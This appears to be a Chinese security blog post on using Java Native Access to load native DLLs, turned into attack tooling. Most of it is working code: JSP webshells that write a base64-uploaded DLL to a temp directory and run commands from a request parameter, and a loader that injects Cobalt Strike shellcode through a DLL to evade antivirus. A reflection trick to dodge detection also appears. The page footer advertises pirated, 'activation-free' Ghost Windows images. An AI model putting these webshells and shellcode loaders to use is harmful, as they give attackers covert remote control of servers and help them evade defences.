我们一起聊聊 JNA 调用动态链接库
我们一起聊聊 JNA 调用动态链接库
作者:CSeroad 2023-05-09 08:24:11安全 应用安全 在学习JNA调用动态链接库的时候,借鉴了很多师傅的思路,但无奈赶不上师傅们的高度,只能用稍微复杂点的办法完善自己的代码,来曲折得实现效果。前言
在一次实际项目中遇到了无法调用exe可执行文件,听说哥斯拉利用JNA技术实现了内存加载exe、执行命令等操作,特来实践一下。
JNA 基础知识
JNA全称:Java Native Access,是建立在JNI(Java Native Interface)技术之上的Java开源框架,JNA提供了一组Java工具类用于在运行期间动态访问的系统本地库。简单理解就是:JNA提供了一个"桥梁",可以利用Java代码直接访问动态链接库中的函数。
调用JNI接口
调用JNI接口的步骤为:
创建工程,将dll文件放到工程下引入JNA相关的jar包创建继承自Library类的接口接口中创建对象用于加载DLL/SO的类库接口中声明DLL/SO类库头文件中暴露的方法调用该方法编译DLL
以windows为例,使用Visual Studio 创建一个动态链接库的工程,并定义一个头文件testdll.h和源文件testdll.cpp。简单实现一个SayHello的方法创建testdll.cpp,作用是用来实现被声明的函数。
#include "pch.h"#include "testdll.h"void SayHello(){std::cout << "Hello!你成功了!" << std::endl;}创建testdll.h头文件,作用是用来声明需要导出的函数接口
#pragma once#include而后编译出dll。注意:要DLL位数要与JDK位数相同,否则无法调用。
导入JAR包
首先创建java工程,可以是普通项目也可以是maven功能。maven 需要导入依赖
普通工程可以在 https://github.com/java-native-access/jna 下载jna jar包和platform jar包并导入。
调用DLL
我们需要继承Library类接口,调用Native类的load方法将我们的testdll.dll加载进来并转换为本地库,而后声明SayHello方法。
public interface Mydll extends Library {Mydll mydll = (Mydll)Native.load("testdll",Mydll.class);void SayHello();}调用时不需要链接库的后缀,会自动加上。声明SayHello方法时,结合testdll.h头文件,没有返回值为void,也没有需要的数据类型。(需要的话可查找JNA 数据类型对应关系)
然后在主方法里调用SayHello方法
public static void main(String[] args) {Mydll.mydll.SayHello();}可以看到成功调用了testdll.dll的SayHello方法。
加载动态链接库
在上面的代码中,我们直接利用Native.load将dll转换为本地库,在此之前缺少了加载这一步。常见的加载动态链接库有三种方法:
System.load / System.loadLibraryRuntime.getRuntime().load / Runtime.getRuntime().loadLibrarycom.sun.glass.utils.NativeLibLoader.loadLibrary在使用时也有一些区别:load接收的是系统的绝对路径,loadLibrary接收的是相对路径。但实际利用过程中肯定是绝对路径优先于相对路径。以Runtime.getRuntime().load为例:
但实际利用可能会被安全软件捕捉。我们反射调用loadLibrary方法。代码来自Java加载动态链接库这篇文章
try {Class clazz = Class.forName("java.lang.ClassLoader");java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class);method.setAccessible(true);method.invoke(null, clazz, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll", true);Mydll mydll = (Mydll)Native.load("testdll",Mydll.class);mydll.SayHello();}catch (Exception e){e.printStackTrace();}场景利用
现在我们想一下具体场景的利用,在此基础上调整我们的代码。
webshell
既然jna加载动态链接库后转换为本地库,可以调用dll的任意方法,那实现一个命令执行应该也是可以的。
#include "pch.h"#include "command.h"#include相应的头文件
#pragma once#includejava代码加载并调用。
import com.sun.jna.Library;import com.sun.jna.Native;public class test {public interface Mydll extends Library {void executeCommand(String command);}public static void main(String[] args) {try {Class clazz = Class.forName("java.lang.ClassLoader");java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class);method.setAccessible(true);method.invoke(null, clazz, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll", true);Mydll mydll = (Mydll)Native.load("testdll",Mydll.class);mydll.executeCommand("ipconfig");}catch (Exception e){e.printStackTrace();}}}成功实现。结合实际利用我们还需要优化一下代码,改成jsp脚本文件。因为com.sun.jna包是第三方包,在实际利用肯定没有。所以这里选择将自己写的代码和jna.jar一块用maven打包为maven02-1.0-SNAPSHOT-jar-with-dependencies.jar试试。
再把test类名修改为show,把dll动态链接库和将要执行的命令作为参数传递进去。现在还差一个加载外部的jar包并调用方法的jsp脚本文件。
<%@ page import="java.lang.reflect.Method" %><%@ page import="java.net.URL" %><%@ page import="java.net.URLClassLoader" %><%String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar";URLClassLoader urlClassLoader =null;Class> MyTest = null;//通过URLClassLoader加载外部jarurlClassLoader = new URLClassLoader(new URL[]{new URL(path)});//获取外部jar里面的具体类对象MyTest = urlClassLoader.loadClass("com.jna.jnatest");//创建对象实例Object instance = MyTest.newInstance();//获取实例当中的方法名为showMethod method = MyTest.getMethod("show", String.class,String.class);//传入实例以及方法参数信息执行这个方法Object ada = method.invoke(instance, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll","whoami");%>这样用的时候需要向目标服务器手动上传两个文件,jar包和dll文件。我们再进一步优化一下。
<%@ page import="java.lang.reflect.Method" %><%@ page import="java.net.URLClassLoader" %><%@ page import="java.net.URL" %><%!private String getFileName(){String fileName = "";java.util.Random random = new java.util.Random(System.currentTimeMillis());String os = System.getProperty("os.name").toLowerCase();if (os.contains("windows")){fileName = "C:\\Windows\\Temp\\" + random.nextInt(10000000) + ".dll";}else {fileName = "/tmp/"+ random.nextInt(10000000) + ".so";}return fileName;}public String UploadBase64DLL(String base64) throws Exception {sun.misc.BASE64Decoder b = new sun.misc.BASE64Decoder();java.io.File file = new java.io.File(getFileName());java.io.FileOutputStream fos = new java.io.FileOutputStream(file);fos.write(b.decodeBuffer(base64));fos.close();return file.getAbsolutePath();}%><%try{String cmd = request.getParameter("cmd");String base64 = request.getParameter("base64");String file =UploadBase64DLL(base64);String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar";//通过URLClassLoader加载外部jarURLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL(path)});//获取外部jar里面的具体类对象Class> MyTest = urlClassLoader.loadClass("com.jna.jnatest");//创建对象实例Object instance = MyTest.newInstance();//获取实例当中的方法名为show,参数只有一个且类型为string的public方法Method method = MyTest.getMethod("show", String.class,String.class);//传入实例以及方法参数信息执行这个方法Object ada = method.invoke(instance, file,cmd);}catch (Exception e){out.println(e);}%>现在只需要手动上传一个jar包就可以,dll通过base64编码上传上去。这样参数值就是base64编码之后的dll和cmd要执行的系统命令。
唯一的缺点就是不能在前端显示,或许将代码加入到冰蝎可以实现?
shellcode
既然前端无法获取结果,那直接加载shellcode上线cs呢?我们利用同样的方式写出加载shellcode的代码。shellcode.cpp
#include "shellcode.h"#includeshellcode.h
#pragma once#include在java里加载并调用,传入shellcode和长度。以达到更好的免杀性。
import java.util.Base64;import com.sun.jna.Library;import com.sun.jna.Native;public class test {public interface Mydll extends Library {void shellcode(byte[] b,int length);}public static void show(String base64,String dllpath,String dllname) {try {Class clazz = Class.forName("java.lang.ClassLoader");java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class);method.setAccessible(true);method.invoke(null, clazz, dllpath, true);Mydll mydll = (Mydll)Native.load(dllname,Mydll.class);byte[] base64decodedBytes = java.util.Base64.getDecoder().decode(base64);int leng = base64decodedBytes.length;mydll.shellcode(base64decodedBytes,leng);}catch (Exception e){e.printStackTrace();}}public static void main(String[] args) {String base64encodedString = "XHhmY1x4NDhxxxxxxxxxxxxxxx";show(base64encodedString,"C:\\Windows\\Temp\\jna.dll","jna");}}此时只需要将shellcode值base64编码当做字符传递即可。测试一下
可以看到正常上线,进程为javaw.exe。那在实际环境中同样不能这样利用。依旧把java代码打包为jar包,再修改一下jsp脚本文件应该就可以在实际运行了。
<%@ page import="java.lang.reflect.Method" %><%@ page import="java.net.URLClassLoader" %><%@ page import="java.net.URL" %><%!private String getFileName(String dllname){String fileName = "";String os = System.getProperty("os.name").toLowerCase();if (os.contains("windows")){fileName = "C:\\Windows\\Temp\\" + dllname + ".dll";}else {fileName = "/tmp/"+ dllname + ".so";}return fileName;}public String UploadBase64DLL(String base64,String dllname) throws Exception {sun.misc.BASE64Decoder b = new sun.misc.BASE64Decoder();java.io.File file = new java.io.File(getFileName(dllname));java.io.FileOutputStream fos = new java.io.FileOutputStream(file);fos.write(b.decodeBuffer(base64));fos.close();return file.getAbsolutePath();}%><%try{String shellcode = request.getParameter("shellcode");String base64dll = request.getParameter("base64dll");String dllname = request.getParameter("dllname");String pathdll = UploadBase64DLL(base64dll,dllname);String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar";URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL(path)});Class> MyTest = urlClassLoader.loadClass("com.jna.jnatest");Object instance = MyTest.newInstance();Method method = MyTest.getMethod("show", String.class,String.class,String.class);Object ada = method.invoke(instance,shellcode, pathdll,dllname);}catch (Exception e){out.println(e);}%>以tomcat为例,shellcode 即将cobaltstrike的shellcode进行base64编码,base64dll 是base64编码dll动态链接库之后的值,dllname即是dll动态链接库的名称。测试可以正常上线执行命令。上线进程为java.exe。
总结
在学习JNA调用动态链接库的时候,借鉴了很多师傅的思路,但无奈赶不上师傅们的高度,只能用稍微复杂点的办法完善自己的代码,来曲折得实现效果。
参考资料
https://www.bilibili.com/video/BV16t411A7it/?spm_id_from=333.337.search-card.all.click&vd_source=0627d2723fb97773126096556cc98e0dhttps://www.cnblogs.com/happyhuangjinjin/p/17219986.htmlhttps://tttang.com/archive/1436/https://payloads.online/archivers/2022-08-11/1/
本文作者:CSeroad,转载请注明来自FreeBuf.COM
责任编辑:武晓燕 来源:FreeBuf.COM JNA链接库代码推荐系统
电脑公司Ghost Win8.1 x32 精选纯净版2022年7月(免激活) ISO镜像高速下载
语言:中文版系统大小:2.98GB系统类型:Win8电脑公司Ghost Win8.1x32位纯净版V2022年7月版本集成了自2022流行的各种硬件驱动,首次进入系统即全部硬件已安装完毕。电脑公司Ghost Win8.1x32位纯净版具有更安全、更稳定、更人性化等特点。集成最常用的装机软件,精心挑选的系统维护工具,加上绿茶独有
微软Win11原版22H2下载_Win11GHOST 免 激活密钥 22H2正式版64位免费下载
语言:中文版系统大小:5.13GB系统类型:Win11微软Win11原版22H2下载_Win11GHOST 免 激活密钥 22H2正式版64位免费下载系统在家用办公上跑分表现都是非常优秀,完美的兼容各种硬件和软件,运行环境安全可靠稳定。Win11 64位 Office办公版(免费)优化 1、保留 Edge浏览器。 2、隐藏“操作中心”托盘图标。 3、保留常用组件(微软商店,计算器,图片查看器等)。 5、关闭天气资讯。
Win11 21H2 官方正式版下载_Win11 21H2最新系统免激活下载
语言:中文版系统大小:4.75GB系统类型:Win11Ghost Win11 21H2是微软在系统方面技术积累雄厚深耕多年,Ghost Win11 21H2系统在家用办公上跑分表现都是非常优秀,完美的兼容各种硬件和软件,运行环境安全可靠稳定。Ghost Win11 21H2是微软最新发布的KB5019961补丁升级而来的最新版的21H2系统,以Windows 11 21H2 22000 1219 专业版为基础进行优化,保持原汁原味,系统流畅稳定,保留常用组件
windows11中文版镜像 微软win11正式版简体中文GHOST ISO镜像64位系统下载
语言:中文版系统大小:5.31GB系统类型:Win11windows11中文版镜像 微软win11正式版简体中文GHOST ISO镜像64位系统下载,微软win11发布快大半年了,其中做了很多次补丁和修复一些BUG,比之前的版本有一些功能上的调整,目前已经升级到最新版本的镜像系统,并且优化了自动激活,永久使用。windows11中文版镜像国内镜像下载地址微软windows11正式版镜像 介绍:1、对函数算法进行了一定程度的简化和优化
微软windows11正式版GHOST ISO镜像 win11下载 国内最新版渠道下载
语言:中文版系统大小:5.31GB系统类型:Win11微软windows11正式版GHOST ISO镜像 win11下载 国内最新版渠道下载,微软2022年正式推出了win11系统,很多人迫不及待的要体验,本站提供了最新版的微软Windows11正式版系统下载,微软windows11正式版镜像 是一款功能超级强大的装机系统,是微软方面全新推出的装机系统,这款系统可以通过pe直接的完成安装,对此系统感兴趣,想要使用的用户们就快来下载
微软windows11系统下载 微软原版 Ghost win11 X64 正式版ISO镜像文件
语言:中文版系统大小:0MB系统类型:Win11微软Ghost win11 正式版镜像文件是一款由微软方面推出的优秀全新装机系统,这款系统的新功能非常多,用户们能够在这里体验到最富有人性化的设计等,且全新的柔软界面,看起来非常的舒服~微软Ghost win11 正式版镜像文件介绍:1、与各种硬件设备兼容。 更好地完成用户安装并有效地使用。2、稳定使用蓝屏,系统不再兼容,更能享受无缝的系统服务。3、为
雨林木风Windows11专业版 Ghost Win11官方正式版 (22H2) 系统下载
语言:中文版系统大小:4.75GB系统类型:雨林木风Windows11专业版 Ghost Win11官方正式版 (22H2) 系统下载在系统方面技术积累雄厚深耕多年,打造了国内重装系统行业的雨林木风品牌,其系统口碑得到许多人认可,积累了广大的用户群体,雨林木风是一款稳定流畅的系统,一直以来都以用户为中心,是由雨林木风团队推出的Windows11国内镜像版,基于国内用户的习惯,做了系统性能的优化,采用了新的系统
雨林木风win7旗舰版系统下载 win7 32位旗舰版 GHOST 免激活镜像ISO
语言:中文版系统大小:5.91GB系统类型:Win7雨林木风win7旗舰版系统下载 win7 32位旗舰版 GHOST 免激活镜像ISO在系统方面技术积累雄厚深耕多年,加固了系统安全策略,雨林木风win7旗舰版系统在家用办公上跑分表现都是非常优秀,完美的兼容各种硬件和软件,运行环境安全可靠稳定。win7 32位旗舰装机版 v2019 05能够帮助用户们进行系统的一键安装、快速装机等,系统中的内容全面,能够为广大用户
相关文章
- win10开机提示没有检测到开机设备
- WinXP提示证书出错导航已停止怎样处理?
- Win10系统分屏功能如何关闭?
- XP网络与共享中心在啥地方?XP怎样打开网络与共享中心?
- 求问mac装双系统win7如何解决分辨率的问题。
- QQ输入法不显示拼音怎么解决?QQ拼音输入法不显示拼音的解决方法
- 新浪微博2招简单举报虚假消息_新浪微博
- win7如何更改盘符 win7系统win7怎么改盘符更改盘符操作方法
- 隐藏文件夹,本文教您电脑隐藏文件夹怎样恢复
- 奇迹时代4下载慢怎么办 Steam游戏下载慢解决方法
- win7系统开机未能启动kavbootc sys文件丢失修复方法
- win7系统如何调整屏幕内图标和文字大小的方法
- Win10打不开VS2010提示找不到rcdll.dll怎么解决?
- windows7旗舰版纯净版32位安装版最新系统推荐
- 闪存盘与u盘的区别是啥?本文教您u盘介绍
- win7系统无法安装软件提示error launching installer
- 去迪拜当乞丐的飞机票图片怎样生成?_其它聊天
- 解决win7蓝牙图标不见了的方法
热门系统
- 1华硕笔记本&台式机专用系统 GhostWin7 32位正式旗舰版2018年8月(32位)ISO镜像下载
- 2深度技术 Windows 10 x86 企业版 电脑城装机版2018年10月(32位) ISO镜像免费下载
- 3电脑公司 装机专用系统Windows10 x86喜迎国庆 企业版2020年10月(32位) ISO镜像快速下载
- 4雨林木风 Ghost Win7 SP1 装机版 2020年4月(32位) 提供下载
- 5深度技术 Windows 10 x86 企业版 六一节 电脑城装机版 版本1903 2022年6月(32位) ISO镜像免费下载
- 6深度技术 Windows 10 x64 企业版 电脑城装机版2021年1月(64位) 高速下载
- 7新萝卜家园电脑城专用系统 Windows10 x64 企业版2019年10月(64位) ISO镜像免费下载
- 8新萝卜家园 GhostWin7 SP1 最新电脑城极速装机版2018年8月(32位)ISO镜像下载
- 9电脑公司Ghost Win8.1 x32 精选纯净版2022年5月(免激活) ISO镜像高速下载
- 10新萝卜家园Ghost Win8.1 X32 最新纯净版2018年05(自动激活) ISO镜像免费下载
热门文章
常用系统
- 1联想笔记本Windows10专业版下载_联想正版Win10系统免激活下载
- 2win11 RTM正式版iso镜像 v2023下载
- 3Win10游戏版下载_Win10 64位虚拟机游戏多开版系统2023.02下载
- 4win10专业版纯净版iso下载_win10专业版纯净版iso百度盘下载
- 5雨林木风Ghost Win8.1 x64位 多驱动纯净版2018年7月(免激活) 提供下载
- 6笔记本&台式机专用系统 Windows10 企业版 版本1903 2021年4月(32位) ISO镜像快速下载
- 7雨林木风Ghost Win7 sp1 32位 旗舰装机版 v2021.02系统最新版下载
- 8深度技术Ghost win7装机版64位 v2019下载
- 9雨林木风 GHOST WIN10 X86 装机旗舰版 V2019.03 (32位) 下载
- 10Win10激活镜像文件下载_笔记本专用Ghost Win10专业激活版下载V2021.11